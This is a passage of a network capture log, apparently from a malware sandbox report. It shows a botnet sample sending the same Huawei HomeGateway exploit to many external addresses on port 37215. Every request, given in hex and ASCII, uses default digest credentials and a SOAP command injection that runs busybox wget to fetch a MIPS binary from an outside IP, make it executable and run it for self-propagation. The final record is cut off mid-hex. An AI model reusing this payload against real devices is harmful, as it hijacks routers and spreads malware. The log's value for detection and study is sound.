                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1314192.168.2.134814452.208.70.6937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.536695004 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1315192.168.2.1344912197.147.232.19837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.536695957 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1316192.168.2.1344064197.173.149.1037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.536720991 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1317192.168.2.1352892149.146.139.16537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.536750078 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1318192.168.2.1343438197.185.5.3237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.537067890 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1319192.168.2.1353254157.65.234.8937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.537087917 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1320192.168.2.1358988157.243.149.16737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.537134886 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1321192.168.2.1357638157.22.81.4337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.537218094 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1322192.168.2.13473389.162.218.9937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.537523985 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1323192.168.2.1347466157.180.40.11137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.537565947 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 